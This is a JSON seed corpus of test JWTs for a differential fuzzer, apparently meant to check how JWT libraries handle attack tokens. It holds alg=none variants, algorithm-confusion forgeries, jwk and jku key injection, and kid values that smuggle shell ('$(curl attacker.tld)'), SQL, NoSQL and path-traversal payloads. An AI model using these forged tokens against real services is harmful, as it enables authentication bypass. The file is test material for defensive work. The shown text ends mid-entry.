Zion Boggan
repos/JWT Differential Fuzzer/corpus/seed.json
zionboggan.com ↗
Code Commits Tags
883 lines · json
History for this file →
1
[
2
  {
3
    "id": "base-rs256",
4
    "class": "baseline",
5
    "severity": "control",
6
    "token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.tx58nNtuT3ptFnCN-UKsEdMZl8WeQl0G8vvayicqYQja5DQt5MQZYp0yOJgQbACx5LMf6ccc62um6Z7Uku-iF9Hkez4oIdIaXCwZEVKyp4kRZPyb0y7AqdeWDpkolrjazRPc8FKEVNtwOVHHHaJSWE-IDMFqrIX1LtHjWPsq8_tlbtD5DjOPlVoV934xjY-sI4iD5k2OZsViGyX5IKC9kd1mzEaPLW2J8Kv6iS_l9HAGMgD54MVVVvT6YMgF4rdmDUrZADv99Pzhl9WEwR8f_semZ_orn-B03LGhT6OlZ1yhxdFJNTHMOzhRSmNA2RsZXLf3xdIIvZR2n6zzIIqyTA",
7
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
8
    "algs": [
9
      "RS256"
10
    ],
11
    "expected_unanimous": "accept",
12
    "notes": "happy path RS256"
13
  },
14
  {
15
    "id": "base-hs256",
16
    "class": "baseline",
17
    "severity": "control",
18
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.55nVZ-A9ktH6dL28cKDqolUuqZ5B3qmk-IOrOL1NiLI",
19
    "key": "schism-secret",
20
    "algs": [
21
      "HS256"
22
    ],
23
    "expected_unanimous": "accept",
24
    "notes": "happy path HS256"
25
  },
26
  {
27
    "id": "base-es256",
28
    "class": "baseline",
29
    "severity": "control",
30
    "token": "eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.AN9mMXlbVYbH_Cv4tRVhbeuRrdDYw5LKjmjEdTxkjQWQgnVQocbAAvoy3snDUZBWt01fsEWeBA4dYi6eD2j-FA",
31
    "key": "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEZOVHAj2poJe0WbUgpGQsRT//R7TI\nwehXbRRwZ9mmX7I+P+KJmNqTlzxOW+UzCvd0GmxHQCR7PpaqmysAzii4tg==\n-----END PUBLIC KEY-----\n",
32
    "algs": [
33
      "ES256"
34
    ],
35
    "expected_unanimous": "accept",
36
    "notes": "happy path ES256"
37
  },
38
  {
39
    "id": "none-none-905",
40
    "class": "none-alg",
41
    "severity": "bypass-risk",
42
    "token": "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.",
43
    "key": "",
44
    "algs": [
45
      "RS256"
46
    ],
47
    "expected_unanimous": "reject",
48
    "notes": "alg=none lower"
49
  },
50
  {
51
    "id": "none-none-f47",
52
    "class": "none-alg",
53
    "severity": "bypass-risk",
54
    "token": "eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.",
55
    "key": "",
56
    "algs": [
57
      "RS256"
58
    ],
59
    "expected_unanimous": "reject",
60
    "notes": "alg=None title"
61
  },
62
  {
63
    "id": "none-none-167",
64
    "class": "none-alg",
65
    "severity": "bypass-risk",
66
    "token": "eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.",
67
    "key": "",
68
    "algs": [
69
      "RS256"
70
    ],
71
    "expected_unanimous": "reject",
72
    "notes": "alg=NONE upper"
73
  },
74
  {
75
    "id": "none-none-691",
76
    "class": "none-alg",
77
    "severity": "bypass-risk",
78
    "token": "eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.",
79
    "key": "",
80
    "algs": [
81
      "RS256"
82
    ],
83
    "expected_unanimous": "reject",
84
    "notes": "alg=nOnE mixed"
85
  },
86
  {
87
    "id": "none-none\u0000-7bf",
88
    "class": "none-alg",
89
    "severity": "bypass-risk",
90
    "token": "eyJhbGciOiJub25lXHUwMDAwIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.",
91
    "key": "",
92
    "algs": [
93
      "RS256"
94
    ],
95
    "expected_unanimous": "reject",
96
    "notes": "alg=none\\x00 trailing null"
97
  },
98
  {
99
    "id": "none-none-b5f",
100
    "class": "none-alg",
101
    "severity": "bypass-risk",
102
    "token": "eyJhbGciOiIgbm9uZSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.",
103
    "key": "",
104
    "algs": [
105
      "RS256"
106
    ],
107
    "expected_unanimous": "reject",
108
    "notes": "alg= none leading space"
109
  },
110
  {
111
    "id": "none-none-164",
112
    "class": "none-alg",
113
    "severity": "bypass-risk",
114
    "token": "eyJhbGciOiJub25lICIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.",
115
    "key": "",
116
    "algs": [
117
      "RS256"
118
    ],
119
    "expected_unanimous": "reject",
120
    "notes": "alg=none trailing space"
121
  },
122
  {
123
    "id": "none-none-905",
124
    "class": "none-alg",
125
    "severity": "bypass-risk",
126
    "token": "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.",
127
    "key": "",
128
    "algs": [
129
      "RS256"
130
    ],
131
    "expected_unanimous": "reject",
132
    "notes": "alg=none unicode escape"
133
  },
134
  {
135
    "id": "none-with-junk-sig",
136
    "class": "none-alg",
137
    "severity": "bypass-risk",
138
    "token": "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.d2hhdGV2ZXI",
139
    "key": "",
140
    "algs": [
141
      "RS256"
142
    ],
143
    "expected_unanimous": "reject",
144
    "notes": "alg=none with non-empty signature segment"
145
  },
146
  {
147
    "id": "alg-conf-rsa-as-hs256",
148
    "class": "alg-confusion",
149
    "severity": "bypass-risk",
150
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.i2SrGqJ_penQAY2pA8naL0e-un0j_npoTrOq7Wp6oLU",
151
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
152
    "algs": [
153
      "RS256",
154
      "HS256"
155
    ],
156
    "expected_unanimous": "reject",
157
    "notes": "forge HS256 using RSA pubkey PEM as HMAC secret; allowlist includes both"
158
  },
159
  {
160
    "id": "alg-conf-rsa-as-hs384",
161
    "class": "alg-confusion",
162
    "severity": "bypass-risk",
163
    "token": "eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.xtm5wOG43IWlwNLvLgATwONEb_lr9lZpL5qkEnB0q4T19ffoRRGq-Al0A03T1YZT",
164
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
165
    "algs": [
166
      "RS256",
167
      "HS384"
168
    ],
169
    "expected_unanimous": "reject",
170
    "notes": "forge HS384 using RSA pubkey PEM as HMAC secret; allowlist includes both"
171
  },
172
  {
173
    "id": "alg-conf-rsa-as-hs512",
174
    "class": "alg-confusion",
175
    "severity": "bypass-risk",
176
    "token": "eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.tRjn7xrAvyV0vZeErrh5YuuHazyVozT3q68N6BwP_XFnlLgOXm6QYmbaT8drcnSwAOqur_1lAq8Smcp_W_KUnw",
177
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
178
    "algs": [
179
      "RS256",
180
      "HS512"
181
    ],
182
    "expected_unanimous": "reject",
183
    "notes": "forge HS512 using RSA pubkey PEM as HMAC secret; allowlist includes both"
184
  },
185
  {
186
    "id": "alg-conf-ec-as-hs256",
187
    "class": "alg-confusion",
188
    "severity": "bypass-risk",
189
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.EcMk-YGf-IfimnX4uyULAkJ6he3JXGNbkTfn3C3JqdA",
190
    "key": "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEZOVHAj2poJe0WbUgpGQsRT//R7TI\nwehXbRRwZ9mmX7I+P+KJmNqTlzxOW+UzCvd0GmxHQCR7PpaqmysAzii4tg==\n-----END PUBLIC KEY-----\n",
191
    "algs": [
192
      "ES256",
193
      "HS256"
194
    ],
195
    "expected_unanimous": "reject",
196
    "notes": "forge HS256 using EC pubkey PEM as HMAC secret"
197
  },
198
  {
199
    "id": "alg-conf-strict-allowlist",
200
    "class": "alg-confusion",
201
    "severity": "bypass-risk",
202
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.i2SrGqJ_penQAY2pA8naL0e-un0j_npoTrOq7Wp6oLU",
203
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
204
    "algs": [
205
      "RS256"
206
    ],
207
    "expected_unanimous": "reject",
208
    "notes": "token claims HS256 but allowlist=[RS256] \u2014 must reject from allowlist alone"
209
  },
210
  {
211
    "id": "alg-conf-rsa-der-as-hs256",
212
    "class": "alg-confusion",
213
    "severity": "bypass-risk",
214
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.3OJkahPfrOFWiJKcfeBBcrQ4xSOwOGfQCc9l6FLOpWA",
215
    "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6RWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4SHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gAcWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEniyQIDAQAB",
216
    "algs": [
217
      "RS256",
218
      "HS256"
219
    ],
220
    "expected_unanimous": "reject",
221
    "notes": "RSA pubkey DER (no PEM headers) as HMAC secret \u2014 bypasses PEM-detection guards"
222
  },
223
  {
224
    "id": "crit-crit-eca",
225
    "class": "crit-header",
226
    "severity": "bypass-risk",
227
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImNyaXQiOlsiZm9vYmFyIl0sImZvb2JhciI6dHJ1ZX0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.HLMK6_AyQbRqvwjEl-GuSQs-o-LaomVlatLkko26bZU",
228
    "key": "schism-secret",
229
    "algs": [
230
      "HS256"
231
    ],
232
    "expected_unanimous": "reject",
233
    "notes": "crit references unknown ext"
234
  },
235
  {
236
    "id": "crit-crit-b64-false-758",
237
    "class": "crit-header",
238
    "severity": "bypass-risk",
239
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImNyaXQiOlsiYjY0Il0sImI2NCI6ZmFsc2V9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.A8Q9rjIiaCJd0rmaNgf5uPsuzJXQDAlzRGrVN_C54WU",
240
    "key": "schism-secret",
241
    "algs": [
242
      "HS256"
243
    ],
244
    "expected_unanimous": "reject",
245
    "notes": "crit=b64=false (RFC 7797 detached payload)"
246
  },
247
  {
248
    "id": "crit-crit-a90",
249
    "class": "crit-header",
250
    "severity": "bypass-risk",
251
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImNyaXQiOltdfQ.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.rz84KEmWsvmeqnyOEbZCWeRGiMrReq0CE6sUmqeKajI",
252
    "key": "schism-secret",
253
    "algs": [
254
      "HS256"
255
    ],
256
    "expected_unanimous": "reject",
257
    "notes": "crit empty array \u2014 strict reading rejects"
258
  },
259
  {
260
    "id": "crit-crit-676",
261
    "class": "crit-header",
262
    "severity": "bypass-risk",
263
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImNyaXQiOiJmb29iYXIiLCJmb29iYXIiOnRydWV9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.0TEefU2MPDn7TXxJBnCb61kvzDv8VisSc5Jv4GJw7C0",
264
    "key": "schism-secret",
265
    "algs": [
266
      "HS256"
267
    ],
268
    "expected_unanimous": "reject",
269
    "notes": "crit as scalar string instead of array"
270
  },
271
  {
272
    "id": "crit-crit-bb2",
273
    "class": "crit-header",
274
    "severity": "bypass-risk",
275
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImNyaXQiOlsiYWxnIl19.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.xjmMFBhQ8MuHW6-FhxcdcYgOAduP28szRM_PPNKm4nY",
276
    "key": "schism-secret",
277
    "algs": [
278
      "HS256"
279
    ],
280
    "expected_unanimous": "reject",
281
    "notes": "crit names reserved 'alg' \u2014 RFC 7515 4.1.11 forbids reserved names"
282
  },
283
  {
284
    "id": "jwk-embed-oct-self-sign",
285
    "class": "key-injection",
286
    "severity": "bypass-risk",
287
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImp3ayI6eyJrdHkiOiJvY3QiLCJrIjoiWVhSMFlXTnJaWEl0YzNsdGJXVjBjbWxqTFd0bGVRIn19.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.aETw95unD9vuzm_RwSCdBiSb_dgjKTh2P7iUXsoWAb4",
288
    "key": "schism-secret",
289
    "algs": [
290
      "HS256"
291
    ],
292
    "expected_unanimous": "reject",
293
    "notes": "header.jwk embeds attacker oct key, sig validates against THAT key"
294
  },
295
  {
296
    "id": "jwk-embed-rsa-bogus-sig",
297
    "class": "key-injection",
298
    "severity": "bypass-risk",
299
    "token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImp3ayI6eyJrdHkiOiJSU0EiLCJuIjoiZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVIaDRlSGg0ZUhoNGVBIiwiZSI6IkFRQUIifX0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eA",
300
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
301
    "algs": [
302
      "RS256"
303
    ],
304
    "expected_unanimous": "reject",
305
    "notes": "header.jwk RSA + invalid sig; lib must use configured key, not jwk header"
306
  },
307
  {
308
    "id": "jku-attacker-url",
309
    "class": "key-injection",
310
    "severity": "bypass-risk",
311
    "token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImprdSI6Imh0dHBzOi8vYXR0YWNrZXIuZXhhbXBsZS9qd2tzLmpzb24ifQ.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eA",
312
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
313
    "algs": [
314
      "RS256"
315
    ],
316
    "expected_unanimous": "reject",
317
    "notes": "header.jku to attacker domain. Lib must not fetch; sig is invalid anyway."
318
  },
319
  {
320
    "id": "kid-eab19b4b",
321
    "class": "kid-injection",
322
    "severity": "parser-quirk",
323
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uLy4uL2Rldi9udWxsIn0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHg",
324
    "key": "schism-secret",
325
    "algs": [
326
      "HS256"
327
    ],
328
    "expected_unanimous": "reject",
329
    "notes": "kid='../../../../dev/null' \u2014 sig bogus, value is whether lib surfaces oddly"
330
  },
331
  {
332
    "id": "kid-39ef6067",
333
    "class": "kid-injection",
334
    "severity": "parser-quirk",
335
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Iic7IERST1AgVEFCTEUga2V5czstLSJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHg",
336
    "key": "schism-secret",
337
    "algs": [
338
      "HS256"
339
    ],
340
    "expected_unanimous": "reject",
341
    "notes": "kid=\"'; DROP TABLE keys;--\" \u2014 sig bogus, value is whether lib surfaces oddly"
342
  },
343
  {
344
    "id": "kid-6fedc314",
345
    "class": "kid-injection",
346
    "severity": "parser-quirk",
347
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IiQoY3VybCBhdHRhY2tlci50bGQpIn0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHg",
348
    "key": "schism-secret",
349
    "algs": [
350
      "HS256"
351
    ],
352
    "expected_unanimous": "reject",
353
    "notes": "kid='$(curl attacker.tld)' \u2014 sig bogus, value is whether lib surfaces oddly"
354
  },
355
  {
356
    "id": "kid-a5760ebc",
357
    "class": "kid-injection",
358
    "severity": "parser-quirk",
359
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleTFcbmtleTIifQ.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHg",
360
    "key": "schism-secret",
361
    "algs": [
362
      "HS256"
363
    ],
364
    "expected_unanimous": "reject",
365
    "notes": "kid='key1\\nkey2' \u2014 sig bogus, value is whether lib surfaces oddly"
366
  },
367
  {
368
    "id": "kid-e96da96f",
369
    "class": "kid-injection",
370
    "severity": "parser-quirk",
371
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IlxcXFxhdHRhY2tlclxcc2hhcmVcXGtleS5wZW0ifQ.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHg",
372
    "key": "schism-secret",
373
    "algs": [
374
      "HS256"
375
    ],
376
    "expected_unanimous": "reject",
377
    "notes": "kid='\\\\\\\\attacker\\\\share\\\\key.pem' \u2014 sig bogus, value is whether lib surfaces oddly"
378
  },
379
  {
380
    "id": "kid-138a9d4d",
381
    "class": "kid-injection",
382
    "severity": "parser-quirk",
383
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IntcIiRuZVwiOiBudWxsfSJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHg",
384
    "key": "schism-secret",
385
    "algs": [
386
      "HS256"
387
    ],
388
    "expected_unanimous": "reject",
389
    "notes": "kid='{\"$ne\": null}' \u2014 sig bogus, value is whether lib surfaces oddly"
390
  },
391
  {
392
    "id": "kid-936d7c04",
393
    "class": "kid-injection",
394
    "severity": "parser-quirk",
395
